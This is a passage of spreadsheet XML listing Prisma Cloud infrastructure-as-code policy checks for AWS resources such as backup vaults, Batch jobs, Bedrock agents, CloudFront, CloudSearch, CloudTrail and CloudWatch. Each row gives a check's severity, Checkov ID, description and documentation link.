      <c r="S708" t="inlineStr"/>
      <c r="T708" t="b">
        <v>0</v>
      </c>
      <c r="U708" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V708" t="inlineStr">
        <is>
          <t>IaC:General:aws-backup-vault</t>
        </is>
      </c>
      <c r="W708" t="inlineStr">
        <is>
          <t>Ensure Backup Vault is encrypted at rest using KMS CMK</t>
        </is>
      </c>
      <c r="X708" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-backup-vault-is-encrypted-at-rest-using-kms-cmk</t>
        </is>
      </c>
      <c r="Y708" t="inlineStr"/>
      <c r="Z708" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_backup_vault"]}</t>
        </is>
      </c>
      <c r="AA708" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB708" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC708" t="inlineStr">
        <is>
          <t>CKV_AWS_166</t>
        </is>
      </c>
      <c r="AD708" t="b">
        <v>1</v>
      </c>
      <c r="AE708" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF708" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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8" t="inlineStr">
        <is>
          <t>ff405a6a-563e-41ba-995b-37769ea7fb8b</t>
        </is>
      </c>
      <c r="AI708" t="inlineStr"/>
      <c r="AJ708" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK708" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="709">
      <c r="A709" t="inlineStr"/>
      <c r="B709" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C709" s="2" t="inlineStr"/>
      <c r="D709" t="inlineStr"/>
      <c r="E709" t="inlineStr"/>
      <c r="F709" t="inlineStr"/>
      <c r="G709" t="b">
        <v>1</v>
      </c>
      <c r="H7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09" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J709" t="inlineStr">
        <is>
          <t>IaC:General:aws-batch</t>
        </is>
      </c>
      <c r="K709" t="inlineStr">
        <is>
          <t>AWS Batch Job is defined as a privileged container</t>
        </is>
      </c>
      <c r="L709" t="inlineStr"/>
      <c r="M709" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N709" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O709" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P709" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q709" t="inlineStr"/>
      <c r="R709" t="inlineStr"/>
      <c r="S709" t="inlineStr"/>
      <c r="T709" t="b">
        <v>0</v>
      </c>
      <c r="U709" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V709" t="inlineStr">
        <is>
          <t>IaC:General:aws-batch-job-definition</t>
        </is>
      </c>
      <c r="W709" t="inlineStr">
        <is>
          <t>Batch job does not define a privileged container</t>
        </is>
      </c>
      <c r="X709" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-batch-job-is-not-defined-as-a-privileged-container</t>
        </is>
      </c>
      <c r="Y709" t="inlineStr"/>
      <c r="Z709" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_batch_job_definition"]}</t>
        </is>
      </c>
      <c r="AA709" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB709" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC709" t="inlineStr">
        <is>
          <t>CKV_AWS_210</t>
        </is>
      </c>
      <c r="AD709" t="b">
        <v>1</v>
      </c>
      <c r="AE709" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF709" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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09" t="inlineStr">
        <is>
          <t>58156229-7822-40d0-871b-218e58a68462</t>
        </is>
      </c>
      <c r="AI709" t="inlineStr"/>
      <c r="AJ709" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK709" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="710">
      <c r="A710" t="inlineStr"/>
      <c r="B710" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C710" s="2" t="inlineStr"/>
      <c r="D710" t="inlineStr"/>
      <c r="E710" t="inlineStr"/>
      <c r="F710" t="inlineStr"/>
      <c r="G710" t="b">
        <v>1</v>
      </c>
      <c r="H7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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J710" t="inlineStr">
        <is>
          <t>IaC:General:aws-bedrockagent</t>
        </is>
      </c>
      <c r="K710" t="inlineStr">
        <is>
          <t>Bedrock Agent not encrypted with Customer Master Key (CMK)</t>
        </is>
      </c>
      <c r="L710" t="inlineStr"/>
      <c r="M710" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N710" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O710" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P710" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q710" t="inlineStr"/>
      <c r="R710" t="inlineStr"/>
      <c r="S710" t="inlineStr"/>
      <c r="T710" t="b">
        <v>0</v>
      </c>
      <c r="U710" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V710" t="inlineStr">
        <is>
          <t>IaC:General:aws-bedrockagent-agent</t>
        </is>
      </c>
      <c r="W710" t="inlineStr">
        <is>
          <t>This policy detects whether the AWS Bedrock Agent is encrypted with a Customer Master Key (CMK) instead of default encryption. Using a CMK provides greater control over key management and reduces the risk of unauthorized access, thereby enhancing the data security managed by the Bedrock Agent.</t>
        </is>
      </c>
      <c r="X710" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-373</t>
        </is>
      </c>
      <c r="Y710" t="inlineStr"/>
      <c r="Z710" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_bedrockagent_agent"]}</t>
        </is>
      </c>
      <c r="AA710" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB710" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC710" t="inlineStr">
        <is>
          <t>CKV_AWS_373</t>
        </is>
      </c>
      <c r="AD710" t="b">
        <v>1</v>
      </c>
      <c r="AE710" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF710" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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0" t="inlineStr">
        <is>
          <t>80adab2a-8d30-4be5-b2db-caf0dceeae40</t>
        </is>
      </c>
      <c r="AI710" t="inlineStr"/>
      <c r="AJ710" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK710" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="711">
      <c r="A711" t="inlineStr"/>
      <c r="B711" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C711" s="2" t="inlineStr"/>
      <c r="D711" t="inlineStr"/>
      <c r="E711" t="inlineStr"/>
      <c r="F711" t="inlineStr"/>
      <c r="G711" t="b">
        <v>1</v>
      </c>
      <c r="H7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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J711" t="inlineStr">
        <is>
          <t>IaC:General:aws-cloudfront</t>
        </is>
      </c>
      <c r="K711" t="inlineStr">
        <is>
          <t>CloudFront distributions do not have origin failover configured</t>
        </is>
      </c>
      <c r="L711" t="inlineStr"/>
      <c r="M711" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N711" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O711" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P711" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q711" t="inlineStr"/>
      <c r="R711" t="inlineStr"/>
      <c r="S711" t="inlineStr"/>
      <c r="T711" t="b">
        <v>0</v>
      </c>
      <c r="U711" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V711" t="inlineStr">
        <is>
          <t>IaC:General:aws-cloudfront-distribution</t>
        </is>
      </c>
      <c r="W711" t="inlineStr">
        <is>
          <t>Ensure CloudFront distributions should have origin failover configured</t>
        </is>
      </c>
      <c r="X711" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-310</t>
        </is>
      </c>
      <c r="Y711" t="inlineStr"/>
      <c r="Z711" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_cloudfront_distribution"]}</t>
        </is>
      </c>
      <c r="AA711" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB711" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC711" t="inlineStr">
        <is>
          <t>CKV_AWS_310</t>
        </is>
      </c>
      <c r="AD711" t="b">
        <v>1</v>
      </c>
      <c r="AE711" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF711" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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1" t="inlineStr">
        <is>
          <t>923635c1-e6ea-4311-b747-f15246009e34</t>
        </is>
      </c>
      <c r="AI711" t="inlineStr"/>
      <c r="AJ711" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK711" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="712">
      <c r="A712" t="inlineStr"/>
      <c r="B712" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C712" s="2" t="inlineStr"/>
      <c r="D712" t="inlineStr"/>
      <c r="E712" t="inlineStr"/>
      <c r="F712" t="inlineStr"/>
      <c r="G712" t="b">
        <v>1</v>
      </c>
      <c r="H7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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J712" t="inlineStr">
        <is>
          <t>IaC:General:aws-cloudfront</t>
        </is>
      </c>
      <c r="K712" t="inlineStr">
        <is>
          <t>AWS Cloudfront distribution is disabled</t>
        </is>
      </c>
      <c r="L712" t="inlineStr"/>
      <c r="M712" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N712" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O712" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P712" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q712" t="inlineStr"/>
      <c r="R712" t="inlineStr"/>
      <c r="S712" t="inlineStr"/>
      <c r="T712" t="b">
        <v>0</v>
      </c>
      <c r="U712" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V712" t="inlineStr">
        <is>
          <t>IaC:General:aws-cloudfront-distribution</t>
        </is>
      </c>
      <c r="W712" t="inlineStr">
        <is>
          <t>Ensure Cloudfront distribution is enabled</t>
        </is>
      </c>
      <c r="X712" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-cloudfront-distribution-is-enabled</t>
        </is>
      </c>
      <c r="Y712" t="inlineStr"/>
      <c r="Z712" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_cloudfront_distribution"]}</t>
        </is>
      </c>
      <c r="AA712" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB712" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC712" t="inlineStr">
        <is>
          <t>CKV_AWS_216</t>
        </is>
      </c>
      <c r="AD712" t="b">
        <v>1</v>
      </c>
      <c r="AE712" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF712" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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2" t="inlineStr">
        <is>
          <t>0730042b-c80a-4d4f-aaa4-fb20e53c7c82</t>
        </is>
      </c>
      <c r="AI712" t="inlineStr"/>
      <c r="AJ712" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK712" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="713">
      <c r="A713" t="inlineStr"/>
      <c r="B713" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C713" s="2" t="inlineStr"/>
      <c r="D713" t="inlineStr"/>
      <c r="E713" t="inlineStr"/>
      <c r="F713" t="inlineStr"/>
      <c r="G713" t="b">
        <v>1</v>
      </c>
      <c r="H7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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J713" t="inlineStr">
        <is>
          <t>IaC:General:aws-cloudfront</t>
        </is>
      </c>
      <c r="K713" t="inlineStr">
        <is>
          <t>AWS CloudFront response header policy does not enforce Strict Transport Security</t>
        </is>
      </c>
      <c r="L713" t="inlineStr"/>
      <c r="M713" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N713" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O713" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P713" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q713" t="inlineStr"/>
      <c r="R713" t="inlineStr"/>
      <c r="S713" t="inlineStr"/>
      <c r="T713" t="b">
        <v>0</v>
      </c>
      <c r="U713" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V713" t="inlineStr">
        <is>
          <t>IaC:General:aws-cloudfront-response-headers-policy</t>
        </is>
      </c>
      <c r="W713" t="inlineStr">
        <is>
          <t>Ensure CloudFront response header policy enforces Strict Transport Security</t>
        </is>
      </c>
      <c r="X713" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-cloudfront-response-header-policy-enforces-strict-transport-security</t>
        </is>
      </c>
      <c r="Y713" t="inlineStr"/>
      <c r="Z713" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_cloudfront_response_headers_policy"]}</t>
        </is>
      </c>
      <c r="AA713" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB713" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC713" t="inlineStr">
        <is>
          <t>CKV_AWS_259</t>
        </is>
      </c>
      <c r="AD713" t="b">
        <v>1</v>
      </c>
      <c r="AE713" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF713" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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3" t="inlineStr">
        <is>
          <t>f591940d-8ff7-46ea-addf-4583b3393826</t>
        </is>
      </c>
      <c r="AI713" t="inlineStr"/>
      <c r="AJ713" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK713" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="714">
      <c r="A714" t="inlineStr"/>
      <c r="B714" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C714" s="2" t="inlineStr"/>
      <c r="D714" t="inlineStr"/>
      <c r="E714" t="inlineStr"/>
      <c r="F714" t="inlineStr"/>
      <c r="G714" t="b">
        <v>1</v>
      </c>
      <c r="H7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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J714" t="inlineStr">
        <is>
          <t>IaC:General:aws-cloudsearch</t>
        </is>
      </c>
      <c r="K714" t="inlineStr">
        <is>
          <t>AWS Cloudsearch does not use HTTPs</t>
        </is>
      </c>
      <c r="L714" t="inlineStr"/>
      <c r="M714" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N714" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O714" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P714" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q714" t="inlineStr"/>
      <c r="R714" t="inlineStr"/>
      <c r="S714" t="inlineStr"/>
      <c r="T714" t="b">
        <v>0</v>
      </c>
      <c r="U714" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V714" t="inlineStr">
        <is>
          <t>IaC:General:aws-cloudsearch-domain</t>
        </is>
      </c>
      <c r="W714" t="inlineStr">
        <is>
          <t>Ensure that Cloudsearch is using https</t>
        </is>
      </c>
      <c r="X714" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-cloudsearch-uses-https</t>
        </is>
      </c>
      <c r="Y714" t="inlineStr"/>
      <c r="Z714" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_cloudsearch_domain"]}</t>
        </is>
      </c>
      <c r="AA714" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB714" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC714" t="inlineStr">
        <is>
          <t>CKV_AWS_220</t>
        </is>
      </c>
      <c r="AD714" t="b">
        <v>1</v>
      </c>
      <c r="AE714" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF714" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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4" t="inlineStr">
        <is>
          <t>dd2ed2ef-6a39-40cf-b24b-e77d778c2ec4</t>
        </is>
      </c>
      <c r="AI714" t="inlineStr"/>
      <c r="AJ714" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK714" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="715">
      <c r="A715" t="inlineStr"/>
      <c r="B715" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C715" s="2" t="inlineStr"/>
      <c r="D715" t="inlineStr"/>
      <c r="E715" t="inlineStr"/>
      <c r="F715" t="inlineStr"/>
      <c r="G715" t="b">
        <v>1</v>
      </c>
      <c r="H7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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J715" t="inlineStr">
        <is>
          <t>IaC:General:aws-cloudsearch</t>
        </is>
      </c>
      <c r="K715" t="inlineStr">
        <is>
          <t>AWS Cloudsearch does not use the latest (Transport Layer Security) TLS</t>
        </is>
      </c>
      <c r="L715" t="inlineStr"/>
      <c r="M715" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N715" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O715" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P715" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q715" t="inlineStr"/>
      <c r="R715" t="inlineStr"/>
      <c r="S715" t="inlineStr"/>
      <c r="T715" t="b">
        <v>0</v>
      </c>
      <c r="U715" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V715" t="inlineStr">
        <is>
          <t>IaC:General:aws-cloudsearch-domain</t>
        </is>
      </c>
      <c r="W715" t="inlineStr">
        <is>
          <t>Ensure that Cloudsearch is using latest TLS</t>
        </is>
      </c>
      <c r="X715" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-cloudsearch-uses-the-latest-transport-layer-security-tls-1</t>
        </is>
      </c>
      <c r="Y715" t="inlineStr"/>
      <c r="Z715" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_cloudsearch_domain"]}</t>
        </is>
      </c>
      <c r="AA715" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB715" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC715" t="inlineStr">
        <is>
          <t>CKV_AWS_218</t>
        </is>
      </c>
      <c r="AD715" t="b">
        <v>1</v>
      </c>
      <c r="AE715" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF715" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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5" t="inlineStr">
        <is>
          <t>a29a9c9c-6070-4601-b9b4-160bc4431191</t>
        </is>
      </c>
      <c r="AI715" t="inlineStr"/>
      <c r="AJ715" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK715" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="716">
      <c r="A716" t="inlineStr"/>
      <c r="B716" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C716" s="2" t="inlineStr"/>
      <c r="D716" t="inlineStr"/>
      <c r="E716" t="inlineStr"/>
      <c r="F716" t="inlineStr"/>
      <c r="G716" t="b">
        <v>1</v>
      </c>
      <c r="H7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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J716" t="inlineStr">
        <is>
          <t>IaC:General:aws-cloudtrail</t>
        </is>
      </c>
      <c r="K716" t="inlineStr">
        <is>
          <t>AWS CloudTrail does not define an SNS Topic</t>
        </is>
      </c>
      <c r="L716" t="inlineStr"/>
      <c r="M716" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N716" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O716" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P716" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q716" t="inlineStr"/>
      <c r="R716" t="inlineStr"/>
      <c r="S716" t="inlineStr"/>
      <c r="T716" t="b">
        <v>0</v>
      </c>
      <c r="U716" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V716" t="inlineStr">
        <is>
          <t>IaC:General:aws-cloudtrail</t>
        </is>
      </c>
      <c r="W716" t="inlineStr">
        <is>
          <t>Ensure CloudTrail defines an SNS Topic</t>
        </is>
      </c>
      <c r="X716" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-cloudtrail-defines-an-sns-topic</t>
        </is>
      </c>
      <c r="Y716" t="inlineStr"/>
      <c r="Z716" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_cloudtrail"]}</t>
        </is>
      </c>
      <c r="AA716" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB716" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC716" t="inlineStr">
        <is>
          <t>CKV_AWS_252</t>
        </is>
      </c>
      <c r="AD716" t="b">
        <v>1</v>
      </c>
      <c r="AE716" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF716" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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6" t="inlineStr">
        <is>
          <t>f406af59-d88e-4f51-9718-36c29ec6e20a</t>
        </is>
      </c>
      <c r="AI716" t="inlineStr"/>
      <c r="AJ716" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK716" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="717">
      <c r="A717" t="inlineStr"/>
      <c r="B717" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C717" s="2" t="inlineStr"/>
      <c r="D717" t="inlineStr"/>
      <c r="E717" t="inlineStr"/>
      <c r="F717" t="inlineStr"/>
      <c r="G717" t="b">
        <v>1</v>
      </c>
      <c r="H7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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J717" t="inlineStr">
        <is>
          <t>IaC:General:aws-cloudtrail</t>
        </is>
      </c>
      <c r="K717" t="inlineStr">
        <is>
          <t>CloudTrail Event Data Store does not use Customer Managed Keys (CMKs)</t>
        </is>
      </c>
      <c r="L717" t="inlineStr"/>
      <c r="M717" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N717" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O717" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P717" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q717" t="inlineStr"/>
      <c r="R717" t="inlineStr"/>
      <c r="S717" t="inlineStr"/>
      <c r="T717" t="b">
        <v>0</v>
      </c>
      <c r="U717" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V717" t="inlineStr">
        <is>
          <t>IaC:General:aws-cloudtrail-event-data-store</t>
        </is>
      </c>
      <c r="W717" t="inlineStr">
        <is>
          <t>Ensure Cloud Trail Event Data Store uses CMK</t>
        </is>
      </c>
      <c r="X717" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-294</t>
        </is>
      </c>
      <c r="Y717" t="inlineStr"/>
      <c r="Z717" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_cloudtrail_event_data_store"]}</t>
        </is>
      </c>
      <c r="AA717" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB717" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC717" t="inlineStr">
        <is>
          <t>CKV_AWS_294</t>
        </is>
      </c>
      <c r="AD717" t="b">
        <v>1</v>
      </c>
      <c r="AE717" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF717" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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7" t="inlineStr">
        <is>
          <t>a8e6b463-a5ce-4526-ba1b-b571d41f1dba</t>
        </is>
      </c>
      <c r="AI717" t="inlineStr"/>
      <c r="AJ717" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK717" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="718">
      <c r="A718" t="inlineStr"/>
      <c r="B718" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C718" s="2" t="inlineStr"/>
      <c r="D718" t="inlineStr"/>
      <c r="E718" t="inlineStr"/>
      <c r="F718" t="inlineStr"/>
      <c r="G718" t="b">
        <v>1</v>
      </c>
      <c r="H7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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J718" t="inlineStr">
        <is>
          <t>IaC:General:aws-cloudwatch</t>
        </is>
      </c>
      <c r="K718" t="inlineStr">
        <is>
          <t>AWS CloudWatch Log groups encrypted using default encryption key instead of KMS CMK</t>
        </is>
      </c>
      <c r="L718" t="inlineStr"/>
      <c r="M718" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N718" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O718" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P718" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q718" t="inlineStr"/>
      <c r="R718" t="inlineStr"/>
      <c r="S718" t="inlineStr"/>
      <c r="T718" t="b">
        <v>0</v>
      </c>
      <c r="U718" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V718" t="inlineStr">
        <is>
          <t>IaC:General:aws-cloudwatch-log-group</t>
        </is>
      </c>
      <c r="W718" t="inlineStr">
        <is>
          <t>Ensure that CloudWatch Log Group is encrypted by KMS</t>
        </is>
      </c>
      <c r="X718" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-that-cloudwatch-log-group-is-encrypted-by-kms</t>
        </is>
      </c>
      <c r="Y718" t="inlineStr"/>
      <c r="Z718" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_cloudwatch_log_group"]}</t>
        </is>
      </c>
